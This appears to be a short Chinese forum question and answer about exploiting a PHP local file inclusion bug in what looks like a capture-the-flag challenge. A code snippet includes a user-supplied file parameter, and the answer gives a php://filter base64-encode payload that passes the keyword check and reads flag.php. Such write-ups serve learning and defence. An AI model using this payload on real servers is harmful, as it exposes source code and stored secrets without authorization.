PHP中文件包含漏洞的利用

PHP中文件包含漏洞的利用

if(preg_match("/some/i",$_GET['file']) && isset($_GET['file'])){
        //flag in `flag.php`
        include($_GET['file']);
    }else{
        echo "Try again?";
    }

没有开allow_url_include，所以无法用data协议来解这个问题。因为需要参数file的值包含字符串some,目前不知道如何用php://filter来读文件，想请问有无好的Bypass的方法？

php://filter/read=convert.base64-encode/some/resource=flag.php

使用base64编码后回传